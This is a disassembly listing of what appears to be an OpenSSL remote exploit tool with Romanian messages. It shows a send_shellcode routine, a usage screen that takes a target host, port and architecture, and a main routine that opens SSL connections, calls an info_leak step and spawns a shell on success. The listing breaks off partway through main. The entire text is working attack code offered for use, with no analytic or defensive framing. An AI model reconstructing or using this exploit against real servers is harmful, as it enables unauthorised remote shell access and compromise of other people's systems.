0804964c <send_shellcode+0x234> pushl  0x14(%eax)
0804964f <send_shellcode+0x237> push   %edx
08049650 <send_shellcode+0x238> call   08048d5c <_init+0x1c8>
08049655 <send_shellcode+0x23d> add    $0x10,%esp
08049658 <send_shellcode+0x240> mov    %eax,%eax
0804965a <send_shellcode+0x242> mov    %eax,%eax
0804965c <send_shellcode+0x244> test   %eax,%eax
0804965e <send_shellcode+0x246> je     080496ac <send_shellcode+0x294>
08049660 <send_shellcode+0x248> sub    $0xc,%esp

Possible reference to string:
"Nepotrivire ... Ceea Ce Nu Trebuia Să Se Intâmple"

08049663 <send_shellcode+0x24b> push   $0x804bd80
08049668 <send_shellcode+0x250> call   08048d8c <_init+0x1f8>
0804966d <send_shellcode+0x255> add    $0x10,%esp
08049670 <send_shellcode+0x258> sub    $0xc,%esp
08049673 <send_shellcode+0x25b> movzbl 0xffffbffb(%ebp),%eax
0804967a <send_shellcode+0x262> push   %eax
0804967b <send_shellcode+0x263> movzbl 0xffffbffa(%ebp),%eax
08049682 <send_shellcode+0x26a> push   %eax
08049683 <send_shellcode+0x26b> movzbl 0xffffbff9(%ebp),%eax
0804968a <send_shellcode+0x272> push   %eax
0804968b <send_shellcode+0x273> movzbl 0xffffbff8(%ebp),%eax
08049692 <send_shellcode+0x27a> push   %eax

Possible reference to string:
"Stage1 tag: %02x %02x %02x %02x"

08049693 <send_shellcode+0x27b> push   $0x804bdc0
08049698 <send_shellcode+0x280> call   08048d8c <_init+0x1f8>
0804969d <send_shellcode+0x285> add    $0x20,%esp
080496a0 <send_shellcode+0x288> mov    $0x0,%eax
080496a5 <send_shellcode+0x28d> jmp    080497d2 <send_shellcode+0x3ba>
080496aa <send_shellcode+0x292> mov    %esi,%esi

Referenced from jump at 0804965e ; 

080496ac <send_shellcode+0x294> movl   $0x0,0xffffbff0(%ebp)
080496b6 <send_shellcode+0x29e> mov    %esi,%esi

Referenced from jump at 080496f2 ; 

080496b8 <send_shellcode+0x2a0> mov    0xffffbff0(%ebp),%eax
080496be <send_shellcode+0x2a6> cmp    0x804e900,%eax
080496c4 <send_shellcode+0x2ac> jl     080496c8 <send_shellcode+0x2b0>
080496c6 <send_shellcode+0x2ae> jmp    080496f4 <send_shellcode+0x2dc>

Referenced from jump at 080496c4 ; 

080496c8 <send_shellcode+0x2b0> sub    $0xc,%esp
080496cb <send_shellcode+0x2b3> mov    0xffffbff0(%ebp),%eax
080496d1 <send_shellcode+0x2b9> mov    %eax,%eax
080496d3 <send_shellcode+0x2bb> lea    0x0(,%eax,4),%edx
080496da <send_shellcode+0x2c2> mov    $0x804e500,%eax
080496df <send_shellcode+0x2c7> pushl  (%edx,%eax,1)
080496e2 <send_shellcode+0x2ca> call   08048c0c <_init+0x78>
080496e7 <send_shellcode+0x2cf> add    $0x10,%esp
080496ea <send_shellcode+0x2d2> lea    0xffffbff0(%ebp),%eax
080496f0 <send_shellcode+0x2d8> incl   (%eax)
080496f2 <send_shellcode+0x2da> jmp    080496b8 <send_shellcode+0x2a0>

Referenced from jump at 080496c6 ; 

080496f4 <send_shellcode+0x2dc> movl   $0x0,0xffffbff0(%ebp)
080496fe <send_shellcode+0x2e6> mov    %esi,%esi

Referenced from jump at 0804976c ; 

08049700 <send_shellcode+0x2e8> cmpl   $0x3,0xffffbff0(%ebp)
08049707 <send_shellcode+0x2ef> jle    0804970c <send_shellcode+0x2f4>
08049709 <send_shellcode+0x2f1> jmp    08049770 <send_shellcode+0x358>
0804970b <send_shellcode+0x2f3> nop    

Referenced from jump at 08049707 ; 

0804970c <send_shellcode+0x2f4> mov    0xffffbff0(%ebp),%eax
08049712 <send_shellcode+0x2fa> mov    %eax,%eax
08049714 <send_shellcode+0x2fc> lea    0x0(,%eax,4),%edx
0804971b <send_shellcode+0x303> mov    $0x804e904,%eax
08049720 <send_shellcode+0x308> cmpl   $0x0,(%edx,%eax,1)
08049724 <send_shellcode+0x30c> je     08049764 <send_shellcode+0x34c>
08049726 <send_shellcode+0x30e> mov    0xffffbff0(%ebp),%eax
0804972c <send_shellcode+0x314> mov    %eax,%eax
0804972e <send_shellcode+0x316> lea    0x0(,%eax,4),%edx
08049735 <send_shellcode+0x31d> mov    $0x804e904,%eax
0804973a <send_shellcode+0x322> mov    (%edx,%eax,1),%eax
0804973d <send_shellcode+0x325> cmp    0x8(%ebp),%eax
08049740 <send_shellcode+0x328> je     08049764 <send_shellcode+0x34c>
08049742 <send_shellcode+0x32a> sub    $0xc,%esp
08049745 <send_shellcode+0x32d> mov    0xffffbff0(%ebp),%eax
0804974b <send_shellcode+0x333> mov    %eax,%eax
0804974d <send_shellcode+0x335> lea    0x0(,%eax,4),%edx
08049754 <send_shellcode+0x33c> mov    $0x804e904,%eax
08049759 <send_shellcode+0x341> pushl  (%edx,%eax,1)
0804975c <send_shellcode+0x344> call   0804a128 <ssl_close>
08049761 <send_shellcode+0x349> add    $0x10,%esp

Referenced from jump at 08049724 ; 08049740 ; 

08049764 <send_shellcode+0x34c> lea    0xffffbff0(%ebp),%eax
0804976a <send_shellcode+0x352> incl   (%eax)
0804976c <send_shellcode+0x354> jmp    08049700 <send_shellcode+0x2e8>
0804976e <send_shellcode+0x356> mov    %esi,%esi

Referenced from jump at 08049709 ; 

08049770 <send_shellcode+0x358> sub    $0xc,%esp

Possible reference to string:
"  In Executie ..."

08049773 <send_shellcode+0x35b> push   $0x804bde1
08049778 <send_shellcode+0x360> call   08048d8c <_init+0x1f8>
0804977d <send_shellcode+0x365> add    $0x10,%esp
08049780 <send_shellcode+0x368> push   $0x0
08049782 <send_shellcode+0x36a> mov    0xc(%ebp),%eax
08049785 <send_shellcode+0x36d> mov    0x4(%eax),%eax
08049788 <send_shellcode+0x370> pushl  0x10(%eax)
0804978b <send_shellcode+0x373> mov    0xc(%ebp),%eax
0804978e <send_shellcode+0x376> mov    0x4(%eax),%eax
08049791 <send_shellcode+0x379> pushl  0xc(%eax)
08049794 <send_shellcode+0x37c> mov    0x8(%ebp),%eax
08049797 <send_shellcode+0x37f> pushl  (%eax)
08049799 <send_shellcode+0x381> call   08048e3c <_init+0x2a8>
0804979e <send_shellcode+0x386> add    $0x10,%esp
080497a1 <send_shellcode+0x389> sub    $0xc,%esp

Possible reference to string:
"  Conexiune Stabilită...Bravo ..Esti Hacer ;>>"

080497a4 <send_shellcode+0x38c> push   $0x804be00
080497a9 <send_shellcode+0x391> call   08048d8c <_init+0x1f8>
080497ae <send_shellcode+0x396> add    $0x10,%esp
080497b1 <send_shellcode+0x399> sub    $0xc,%esp
080497b4 <send_shellcode+0x39c> push   $0x2
080497b6 <send_shellcode+0x39e> call   08048d2c <_init+0x198>
080497bb <send_shellcode+0x3a3> add    $0x10,%esp
080497be <send_shellcode+0x3a6> sub    $0xc,%esp
080497c1 <send_shellcode+0x3a9> mov    0x8(%ebp),%eax
080497c4 <send_shellcode+0x3ac> pushl  (%eax)
080497c6 <send_shellcode+0x3ae> call   08048fe0 <sh>
080497cb <send_shellcode+0x3b3> add    $0x10,%esp
080497ce <send_shellcode+0x3b6> mov    %eax,%eax
080497d0 <send_shellcode+0x3b8> mov    %eax,%eax

Referenced from jump at 0804960a ; 0804962e ; 080496a5 ; 

080497d2 <send_shellcode+0x3ba> mov    0xfffffffc(%ebp),%ebx
080497d5 <send_shellcode+0x3bd> leave  
080497d6 <send_shellcode+0x3be> ret    
080497d7 <send_shellcode+0x3bf> nop    

---- Function : usage ----

Referenced from call at 080499b0 ; 08049acc ; 08049aee ; 08049bed ; 

080497d8 <usage> push   %ebp
080497d9 <usage+0x1> mov    %esp,%ebp
080497db <usage+0x3> sub    $0x8,%esp
080497de <usage+0x6> sub    $0x8,%esp
080497e1 <usage+0x9> pushl  0x8(%ebp)

Possible reference to string:
"Folosire: %s [Optiuni] <host>"

080497e4 <usage+0xc> push   $0x804be40
080497e9 <usage+0x11> call   08048d8c <_init+0x1f8>
080497ee <usage+0x16> add    $0x10,%esp
080497f1 <usage+0x19> sub    $0xc,%esp

Possible reference to string:
"  -a <arch>          Arhitectură (default is 0x00)"

080497f4 <usage+0x1c> push   $0x804be60
080497f9 <usage+0x21> call   08048d8c <_init+0x1f8>
080497fe <usage+0x26> add    $0x10,%esp
08049801 <usage+0x29> sub    $0xc,%esp

Possible reference to string:
"  -p <port>          SSL port (default is 443)"

08049804 <usage+0x2c> push   $0x804bea0
08049809 <usage+0x31> call   08048d8c <_init+0x1f8>
0804980e <usage+0x36> add    $0x10,%esp
08049811 <usage+0x39> sub    $0xc,%esp

Possible reference to string:
"  -c <N>             Număr Minim De Conexiuni (default is 30)"

08049814 <usage+0x3c> push   $0x804bee0
08049819 <usage+0x41> call   08048d8c <_init+0x1f8>
0804981e <usage+0x46> add    $0x10,%esp
08049821 <usage+0x49> sub    $0xc,%esp

Possible reference to string:
"  -m <N>             Număr Maxim De Conexiuni (default is 50)"

08049824 <usage+0x4c> push   $0x804bf20
08049829 <usage+0x51> call   08048d8c <_init+0x1f8>
0804982e <usage+0x56> add    $0x10,%esp
08049831 <usage+0x59> sub    $0xc,%esp

Possible reference to string:
"  -v                 Verbose Mode"

08049834 <usage+0x5c> push   $0x804bf60
08049839 <usage+0x61> call   08048d8c <_init+0x1f8>
0804983e <usage+0x66> add    $0x10,%esp
08049841 <usage+0x69> sub    $0xc,%esp

Possible reference to string:
"Arhitecturi:"

08049844 <usage+0x6c> push   $0x804bf84
08049849 <usage+0x71> call   08048d8c <_init+0x1f8>
0804984e <usage+0x76> add    $0x10,%esp
08049851 <usage+0x79> movl   $0x0,0xfffffffc(%ebp)

Referenced from jump at 080498d0 ; 

08049858 <usage+0x80> cmpl   $0x15,0xfffffffc(%ebp)
0804985c <usage+0x84> jbe    080498a0 <usage+0xc8>
0804985e <usage+0x86> sub    $0xc,%esp

Possible reference to string:
""

08049861 <usage+0x89> push   $0x804bfa0
08049866 <usage+0x8e> call   08048d8c <_init+0x1f8>
0804986b <usage+0x93> add    $0x10,%esp
0804986e <usage+0x96> sub    $0x8,%esp
08049871 <usage+0x99> pushl  0x8(%ebp)

Possible reference to string:
"Exemple: %s -a 0x01 -v localhost"

08049874 <usage+0x9c> push   $0x804bfc0
08049879 <usage+0xa1> call   08048d8c <_init+0x1f8>
0804987e <usage+0xa6> add    $0x10,%esp
08049881 <usage+0xa9> sub    $0x8,%esp
08049884 <usage+0xac> pushl  0x8(%ebp)

Possible reference to string:
"          %s -p 1234 192.168.0.1 -c 40 -m 80"

08049887 <usage+0xaf> push   $0x804c000
0804988c <usage+0xb4> call   08048d8c <_init+0x1f8>
08049891 <usage+0xb9> add    $0x10,%esp
08049894 <usage+0xbc> sub    $0xc,%esp
08049897 <usage+0xbf> push   $0x1
08049899 <usage+0xc1> call   08048dfc <_init+0x268>
0804989e <usage+0xc6> mov    %esi,%esi

Referenced from jump at 0804985c ; 

080498a0 <usage+0xc8> sub    $0x4,%esp
080498a3 <usage+0xcb> mov    0xfffffffc(%ebp),%edx
080498a6 <usage+0xce> mov    %edx,%eax
080498a8 <usage+0xd0> shl    %eax
080498aa <usage+0xd2> add    %edx,%eax
080498ac <usage+0xd4> lea    0x0(,%eax,4),%edx
080498b3 <usage+0xdb> mov    $0x804dff0,%eax
080498b8 <usage+0xe0> pushl  (%edx,%eax,1)
080498bb <usage+0xe3> pushl  0xfffffffc(%ebp)

Possible reference to string:
"	0x%02x - %s"

080498be <usage+0xe6> push   $0x804bf92
080498c3 <usage+0xeb> call   08048d8c <_init+0x1f8>
080498c8 <usage+0xf0> add    $0x10,%esp
080498cb <usage+0xf3> lea    0xfffffffc(%ebp),%eax
080498ce <usage+0xf6> incl   (%eax)
080498d0 <usage+0xf8> jmp    08049858 <usage+0x80>
080498d2 <usage+0xfa> mov    %esi,%esi

---- Function : main ----
080498d4 <main> push   %ebp
080498d5 <main+0x1> mov    %esp,%ebp
080498d7 <main+0x3> sub    $0x28,%esp
080498da <main+0x6> movl   $0x1bb,0xfffffff0(%ebp)
080498e1 <main+0xd> movl   $0x0,0xffffffec(%ebp)
080498e8 <main+0x14> movl   $0x1e,0x804e900
080498f2 <main+0x1e> movl   $0x32,0x804e8fc
080498fc <main+0x28> movl   $0x804dff0,0xfffffffc(%ebp)
08049903 <main+0x2f> sub    $0xc,%esp

Possible reference to string:
": OpenSsl Exploit ... Folositi-l Pe Riscul Vostru"

08049906 <main+0x32> push   $0x804c040
0804990b <main+0x37> call   08048d8c <_init+0x1f8>
08049910 <main+0x3c> add    $0x10,%esp
08049913 <main+0x3f> sub    $0xc,%esp

Possible reference to string:
"  by Silviu <Silviu@Silviu.ph>"

08049916 <main+0x42> push   $0x804c080
0804991b <main+0x47> call   08048d8c <_init+0x1f8>
08049920 <main+0x4c> add    $0x10,%esp
08049923 <main+0x4f> sub    $0xc,%esp

Possible reference to string:
""

08049926 <main+0x52> push   $0x804bfa0
0804992b <main+0x57> call   08048d8c <_init+0x1f8>
08049930 <main+0x5c> add    $0x10,%esp
08049933 <main+0x5f> nop    

Referenced from jump at 08049969 ; 080499d2 ; 080499fc ; 08049a77 ; 08049ab0 ; 08049abd ; 08049ad4 ; 

08049934 <main+0x60> sub    $0x4,%esp

Possible reference to string:
"a:c:m:p:v"

08049937 <main+0x63> push   $0x804c0a0
0804993c <main+0x68> pushl  0xc(%ebp)
0804993f <main+0x6b> pushl  0x8(%ebp)
08049942 <main+0x6e> call   08048ccc <_init+0x138>
08049947 <main+0x73> add    $0x10,%esp
0804994a <main+0x76> mov    %eax,%eax
0804994c <main+0x78> mov    %eax,0xffffffe0(%ebp)
0804994f <main+0x7b> cmpl   $0xffffffff,0xffffffe0(%ebp)
08049953 <main+0x7f> jne    0804995c <main+0x88>
08049955 <main+0x81> jmp    08049adc <main+0x208>
0804995a <main+0x86> mov    %esi,%esi

Referenced from jump at 08049953 ; 

0804995c <main+0x88> mov    0xffffffe0(%ebp),%eax
0804995f <main+0x8b> sub    $0x3f,%eax
08049962 <main+0x8e> mov    %eax,0xffffffd8(%ebp)
08049965 <main+0x91> cmpl   $0x37,0xffffffd8(%ebp)
08049969 <main+0x95> ja     08049934 <main+0x60>
0804996b <main+0x97> mov    0xffffffd8(%ebp),%edx
0804996e <main+0x9a> mov    0x804c2b0(,%edx,4),%eax
08049975 <main+0xa1> jmp    *%eax
08049977 <main+0xa3> nop    
08049978 <main+0xa4> sub    $0x4,%esp
0804997b <main+0xa7> lea    0xffffffe4(%ebp),%eax
0804997e <main+0xaa> push   %eax

Possible reference to string:
"0x%x"

0804997f <main+0xab> push   $0x804c0aa
08049984 <main+0xb0> pushl  0x804e4c8
0804998a <main+0xb6> call   08048e1c <_init+0x288>
0804998f <main+0xbb> add    $0x10,%esp
08049992 <main+0xbe> mov    %eax,%eax
08049994 <main+0xc0> test   %eax,%eax
08049996 <main+0xc2> je     080499a8 <main+0xd4>
08049998 <main+0xc4> cmpl   $0x0,0xffffffe4(%ebp)
0804999c <main+0xc8> js     080499a8 <main+0xd4>
0804999e <main+0xca> cmpl   $0x15,0xffffffe4(%ebp)
080499a2 <main+0xce> ja     080499a8 <main+0xd4>
080499a4 <main+0xd0> jmp    080499b8 <main+0xe4>
080499a6 <main+0xd2> mov    %esi,%esi

Referenced from jump at 08049996 ; 0804999c ; 080499a2 ; 

080499a8 <main+0xd4> sub    $0xc,%esp
080499ab <main+0xd7> mov    0xc(%ebp),%eax
080499ae <main+0xda> pushl  (%eax)
080499b0 <main+0xdc> call   080497d8 <usage>
080499b5 <main+0xe1> add    $0x10,%esp

Referenced from jump at 080499a4 ; 

080499b8 <main+0xe4> mov    0xffffffe4(%ebp),%edx
080499bb <main+0xe7> mov    %edx,%eax
080499bd <main+0xe9> shl    %eax
080499bf <main+0xeb> add    %edx,%eax
080499c1 <main+0xed> lea    0x0(,%eax,4),%edx
080499c8 <main+0xf4> mov    $0x804dff0,%eax
080499cd <main+0xf9> add    %edx,%eax
080499cf <main+0xfb> mov    %eax,0xfffffffc(%ebp)
080499d2 <main+0xfe> jmp    08049934 <main+0x60>
080499d7 <main+0x103> nop    
080499d8 <main+0x104> sub    $0xc,%esp
080499db <main+0x107> pushl  0x804e4c8
080499e1 <main+0x10d> call   08048e0c <_init+0x278>
080499e6 <main+0x112> add    $0x10,%esp
080499e9 <main+0x115> mov    %eax,%eax
080499eb <main+0x117> mov    %eax,%eax
080499ed <main+0x119> mov    %eax,0x804e900
080499f2 <main+0x11e> cmpl   $0xfe,0x804e900
080499fc <main+0x128> jle    08049934 <main+0x60>
08049a02 <main+0x12e> sub    $0x8,%esp
08049a05 <main+0x131> push   $0xff

Possible reference to string:
"Nr Maxim Conexiuni %d "

08049a0a <main+0x136> push   $0x804c0af
08049a0f <main+0x13b> call   08048d8c <_init+0x1f8>
08049a14 <main+0x140> add    $0x10,%esp
08049a17 <main+0x143> sub    $0xc,%esp
08049a1a <main+0x146> push   $0x1
08049a1c <main+0x148> call   08048dfc <_init+0x268>
08049a21 <main+0x14d> lea    0x0(%esi),%esi
08049a24 <main+0x150> sub    $0xc,%esp
08049a27 <main+0x153> pushl  0x804e4c8
08049a2d <main+0x159> call   08048e0c <_init+0x278>
08049a32 <main+0x15e> add    $0x10,%esp
08049a35 <main+0x161> mov    %eax,%eax
08049a37 <main+0x163> mov    %eax,%eax
08049a39 <main+0x165> mov    %eax,0x804e8fc
08049a3e <main+0x16a> cmpl   $0xfe,0x804e8fc
08049a48 <main+0x174> jle    08049a6c <main+0x198>
08049a4a <main+0x176> sub    $0x8,%esp
08049a4d <main+0x179> push   $0xff

Possible reference to string:
"Nr Maxim De Conexiuni Eroare %d "

08049a52 <main+0x17e> push   $0x804c0e0
08049a57 <main+0x183> call   08048d8c <_init+0x1f8>
08049a5c <main+0x188> add    $0x10,%esp
08049a5f <main+0x18b> sub    $0xc,%esp
08049a62 <main+0x18e> push   $0x1
08049a64 <main+0x190> call   08048dfc <_init+0x268>
08049a69 <main+0x195> lea    0x0(%esi),%esi

Referenced from jump at 08049a48 ; 

08049a6c <main+0x198> mov    0x804e8fc,%eax
08049a71 <main+0x19d> cmp    0x804e900,%eax
08049a77 <main+0x1a3> jge    08049934 <main+0x60>
08049a7d <main+0x1a9> sub    $0xc,%esp

Possible reference to string:
"Parametrul -m Ar Trebui Să Fie Mai Mare Decât Parametrul -c."

08049a80 <main+0x1ac> push   $0x804c120
08049a85 <main+0x1b1> call   08048d8c <_init+0x1f8>
08049a8a <main+0x1b6> add    $0x10,%esp
08049a8d <main+0x1b9> sub    $0xc,%esp
08049a90 <main+0x1bc> push   $0x1
08049a92 <main+0x1be> call   08048dfc <_init+0x268>
08049a97 <main+0x1c3> nop    
08049a98 <main+0x1c4> sub    $0xc,%esp
08049a9b <main+0x1c7> pushl  0x804e4c8
08049aa1 <main+0x1cd> call   08048e0c <_init+0x278>
08049aa6 <main+0x1d2> add    $0x10,%esp
08049aa9 <main+0x1d5> mov    %eax,%eax
08049aab <main+0x1d7> mov    %eax,%eax
08049aad <main+0x1d9> mov    %eax,0xfffffff0(%ebp)
08049ab0 <main+0x1dc> jmp    08049934 <main+0x60>
08049ab5 <main+0x1e1> lea    0x0(%esi),%esi
08049ab8 <main+0x1e4> lea    0xffffffec(%ebp),%eax
08049abb <main+0x1e7> incl   (%eax)
08049abd <main+0x1e9> jmp    08049934 <main+0x60>
08049ac2 <main+0x1ee> mov    %esi,%esi
08049ac4 <main+0x1f0> sub    $0xc,%esp
08049ac7 <main+0x1f3> mov    0xc(%ebp),%eax
08049aca <main+0x1f6> pushl  (%eax)
08049acc <main+0x1f8> call   080497d8 <usage>
08049ad1 <main+0x1fd> add    $0x10,%esp
08049ad4 <main+0x200> jmp    08049934 <main+0x60>
08049ad9 <main+0x205> lea    0x0(%esi),%esi

Referenced from jump at 08049955 ; 

08049adc <main+0x208> mov    0x804e4cc,%eax
08049ae1 <main+0x20d> cmp    0x8(%ebp),%eax
08049ae4 <main+0x210> jl     08049af6 <main+0x222>
08049ae6 <main+0x212> sub    $0xc,%esp
08049ae9 <main+0x215> mov    0xc(%ebp),%eax
08049aec <main+0x218> pushl  (%eax)
08049aee <main+0x21a> call   080497d8 <usage>
08049af3 <main+0x21f> add    $0x10,%esp

Referenced from jump at 08049ae4 ; 

08049af6 <main+0x222> sub    $0xc,%esp
08049af9 <main+0x225> mov    0x804e4cc,%eax
08049afe <main+0x22a> imul   $0x4,%eax,%edx
08049b01 <main+0x22d> mov    0xc(%ebp),%eax
08049b04 <main+0x230> pushl  (%eax,%edx,1)
08049b07 <main+0x233> call   08048ddc <_init+0x248>
08049b0c <main+0x238> add    $0x10,%esp
08049b0f <main+0x23b> mov    %eax,%eax
08049b11 <main+0x23d> mov    %eax,0xfffffff8(%ebp)
08049b14 <main+0x240> cmpl   $0x0,0xfffffff8(%ebp)
08049b18 <main+0x244> jne    08049b44 <main+0x270>
08049b1a <main+0x246> sub    $0x8,%esp
08049b1d <main+0x249> mov    0x804e4cc,%eax
08049b22 <main+0x24e> imul   $0x4,%eax,%edx
08049b25 <main+0x251> mov    0xc(%ebp),%eax
08049b28 <main+0x254> pushl  (%eax,%edx,1)

Possible reference to string:
"Nu Pot Rezolva Adresa %s"

08049b2b <main+0x257> push   $0x804c15e
08049b30 <main+0x25c> call   08048d8c <_init+0x1f8>
08049b35 <main+0x261> add    $0x10,%esp
08049b38 <main+0x264> sub    $0xc,%esp
08049b3b <main+0x267> push   $0x1
08049b3d <main+0x269> call   08048dfc <_init+0x268>
08049b42 <main+0x26e> mov    %esi,%esi

Referenced from jump at 08049b18 ; 

08049b44 <main+0x270> mov    0xfffffff8(%ebp),%eax
08049b47 <main+0x273> mov    0x10(%eax),%eax
08049b4a <main+0x276> add    $0x4,%eax
08049b4d <main+0x279> cmpl   $0x0,(%eax)
08049b50 <main+0x27c> je     08049bc8 <main+0x2f4>
08049b52 <main+0x27e> sub    $0x8,%esp
08049b55 <main+0x281> mov    0x804e4cc,%eax
08049b5a <main+0x286> imul   $0x4,%eax,%edx
08049b5d <main+0x289> mov    0xc(%ebp),%eax
08049b60 <main+0x28c> pushl  (%eax,%edx,1)

Possible reference to string:
"%s Are Mai Multe Adrese Selectatzi Una Din Ele"

08049b63 <main+0x28f> push   $0x804c180
08049b68 <main+0x294> call   08048d8c <_init+0x1f8>
08049b6d <main+0x299> add    $0x10,%esp
08049b70 <main+0x29c> movl   $0x0,0xffffffe8(%ebp)
08049b77 <main+0x2a3> nop    

Referenced from jump at 08049bc6 ; 

08049b78 <main+0x2a4> mov    0xfffffff8(%ebp),%ecx
08049b7b <main+0x2a7> mov    0xffffffe8(%ebp),%eax
08049b7e <main+0x2aa> imul   $0x4,%eax,%edx
08049b81 <main+0x2ad> mov    0x10(%ecx),%eax
08049b84 <main+0x2b0> cmpl   $0x0,(%eax,%edx,1)
08049b88 <main+0x2b4> jne    08049b94 <main+0x2c0>
08049b8a <main+0x2b6> sub    $0xc,%esp
08049b8d <main+0x2b9> push   $0x1
08049b8f <main+0x2bb> call   08048dfc <_init+0x268>

Referenced from jump at 08049b88 ; 

08049b94 <main+0x2c0> sub    $0x8,%esp
08049b97 <main+0x2c3> sub    $0x4,%esp
08049b9a <main+0x2c6> mov    0xfffffff8(%ebp),%ecx
08049b9d <main+0x2c9> mov    0xffffffe8(%ebp),%eax
08049ba0 <main+0x2cc> imul   $0x4,%eax,%edx
08049ba3 <main+0x2cf> mov    0x10(%ecx),%eax
08049ba6 <main+0x2d2> pushl  (%eax,%edx,1)
08049ba9 <main+0x2d5> call   08048c7c <_init+0xe8>
08049bae <main+0x2da> add    $0x8,%esp
08049bb1 <main+0x2dd> mov    %eax,%eax
08049bb3 <main+0x2df> push   %eax

Possible reference to string:
"%s"

08049bb4 <main+0x2e0> push   $0x804bd16
08049bb9 <main+0x2e5> call   08048d8c <_init+0x1f8>
08049bbe <main+0x2ea> add    $0x10,%esp
08049bc1 <main+0x2ed> lea    0xffffffe8(%ebp),%eax
08049bc4 <main+0x2f0> incl   (%eax)
08049bc6 <main+0x2f2> jmp    08049b78 <main+0x2a4>

Referenced from jump at 08049b50 ; 

08049bc8 <main+0x2f4> mov    0xfffffff8(%ebp),%eax
08049bcb <main+0x2f7> mov    0x10(%eax),%eax
08049bce <main+0x2fa> mov    (%eax),%eax
08049bd0 <main+0x2fc> mov    (%eax),%eax
08049bd2 <main+0x2fe> mov    %eax,0xfffffff4(%ebp)
08049bd5 <main+0x301> incl   0x804e4cc
08049bdb <main+0x307> mov    0x804e4cc,%eax
08049be0 <main+0x30c> cmp    0x8(%ebp),%eax
08049be3 <main+0x30f> jge    08049bf5 <main+0x321>
08049be5 <main+0x311> sub    $0xc,%esp
08049be8 <main+0x314> mov    0xc(%ebp),%eax
08049beb <main+0x317> pushl  (%eax)
08049bed <main+0x319> call   080497d8 <usage>
08049bf2 <main+0x31e> add    $0x10,%esp

Referenced from jump at 08049be3 ; 

08049bf5 <main+0x321> sub    $0xc,%esp
08049bf8 <main+0x324> push   $0x31337
08049bfd <main+0x329> call   08048dcc <_init+0x238>
08049c02 <main+0x32e> add    $0x10,%esp
08049c05 <main+0x331> cmpl   $0x0,0x804e900
08049c0c <main+0x338> je     08049c24 <main+0x350>
08049c0e <main+0x33a> sub    $0x8,%esp
08049c11 <main+0x33d> pushl  0x804e900

Possible reference to string:
" Deschid %d Conexiuni"

08049c17 <main+0x343> push   $0x804c1b0
08049c1c <main+0x348> call   08048d8c <_init+0x1f8>
08049c21 <main+0x34d> add    $0x10,%esp

Referenced from jump at 08049c0c ; 

08049c24 <main+0x350> movl   $0x0,0xffffffe8(%ebp)
08049c2b <main+0x357> nop    

Referenced from jump at 08049c68 ; 

08049c2c <main+0x358> mov    0xffffffe8(%ebp),%eax
08049c2f <main+0x35b> cmp    0x804e900,%eax
08049c35 <main+0x361> jl     08049c3c <main+0x368>
08049c37 <main+0x363> jmp    08049c6c <main+0x398>
08049c39 <main+0x365> lea    0x0(%esi),%esi

Referenced from jump at 08049c35 ; 

08049c3c <main+0x368> sub    $0x8,%esp
08049c3f <main+0x36b> pushl  0xfffffff0(%ebp)
08049c42 <main+0x36e> pushl  0xfffffff4(%ebp)
08049c45 <main+0x371> call   08049fb8 <connect_host>
08049c4a <main+0x376> add    $0x10,%esp
08049c4d <main+0x379> mov    %eax,%ecx
08049c4f <main+0x37b> mov    0xffffffe8(%ebp),%eax
08049c52 <main+0x37e> mov    %eax,%eax
08049c54 <main+0x380> lea    0x0(,%eax,4),%edx
08049c5b <main+0x387> mov    $0x804e500,%eax
08049c60 <main+0x38c> mov    %ecx,(%edx,%eax,1)
08049c63 <main+0x38f> lea    0xffffffe8(%ebp),%eax
08049c66 <main+0x392> incl   (%eax)
08049c68 <main+0x394> jmp    08049c2c <main+0x358>
08049c6a <main+0x396> mov    %esi,%esi

Referenced from jump at 08049c37 ; 08049eea ; 

08049c6c <main+0x398> sub    $0xc,%esp

Possible reference to string:
"  Stabilesc Conexiunea Ssl"

08049c6f <main+0x39b> push   $0x804c1c7
08049c74 <main+0x3a0> call   08048d8c <_init+0x1f8>
08049c79 <main+0x3a5> add    $0x10,%esp
08049c7c <main+0x3a8> movl   $0x0,0xffffffe8(%ebp)
08049c83 <main+0x3af> nop    

Referenced from jump at 08049cbb ; 

08049c84 <main+0x3b0> cmpl   $0x3,0xffffffe8(%ebp)
08049c88 <main+0x3b4> jle    08049c8c <main+0x3b8>
08049c8a <main+0x3b6> jmp    08049cc0 <main+0x3ec>

Referenced from jump at 08049c88 ; 

08049c8c <main+0x3b8> sub    $0x4,%esp
08049c8f <main+0x3bb> pushl  0xffffffec(%ebp)
08049c92 <main+0x3be> pushl  0xfffffff0(%ebp)
08049c95 <main+0x3c1> pushl  0xfffffff4(%ebp)
08049c98 <main+0x3c4> call   0804a074 <ssl_connect_host>
08049c9d <main+0x3c9> add    $0x10,%esp
08049ca0 <main+0x3cc> mov    %eax,%ecx
08049ca2 <main+0x3ce> mov    0xffffffe8(%ebp),%eax
08049ca5 <main+0x3d1> mov    %eax,%eax
08049ca7 <main+0x3d3> lea    0x0(,%eax,4),%edx
08049cae <main+0x3da> mov    $0x804e904,%eax
08049cb3 <main+0x3df> mov    %ecx,(%edx,%eax,1)
08049cb6 <main+0x3e2> lea    0xffffffe8(%ebp),%eax
08049cb9 <main+0x3e5> incl   (%eax)
08049cbb <main+0x3e7> jmp    08049c84 <main+0x3b0>
08049cbd <main+0x3e9> lea    0x0(%esi),%esi

Referenced from jump at 08049c8a ; 

08049cc0 <main+0x3ec> sub    $0xc,%esp

Possible reference to string:
": Incercare De Deschidere..."

08049cc3 <main+0x3ef> push   $0x804c1e4
08049cc8 <main+0x3f4> call   08048d8c <_init+0x1f8>
08049ccd <main+0x3f9> add    $0x10,%esp
08049cd0 <main+0x3fc> movl   $0x0,0xffffffe8(%ebp)
08049cd7 <main+0x403> nop    

Referenced from jump at 08049d37 ; 

08049cd8 <main+0x404> cmpl   $0x2,0xffffffe8(%ebp)
08049cdc <main+0x408> jle    08049ce0 <main+0x40c>
08049cde <main+0x40a> jmp    08049d3c <main+0x468>

Referenced from jump at 08049cdc ; 

08049ce0 <main+0x40c> sub    $0x8,%esp
08049ce3 <main+0x40f> mov    0xfffffffc(%ebp),%eax
08049ce6 <main+0x412> pushl  0x4(%eax)
08049ce9 <main+0x415> mov    0xffffffe8(%ebp),%eax
08049cec <main+0x418> mov    %eax,%eax
08049cee <main+0x41a> lea    0x0(,%eax,4),%edx
08049cf5 <main+0x421> mov    $0x804e904,%eax
08049cfa <main+0x426> pushl  (%edx,%eax,1)
08049cfd <main+0x429> call   0804930c <info_leak>
08049d02 <main+0x42e> add    $0x10,%esp
08049d05 <main+0x431> sub    $0x4,%esp
08049d08 <main+0x434> mov    0xffffffe8(%ebp),%eax
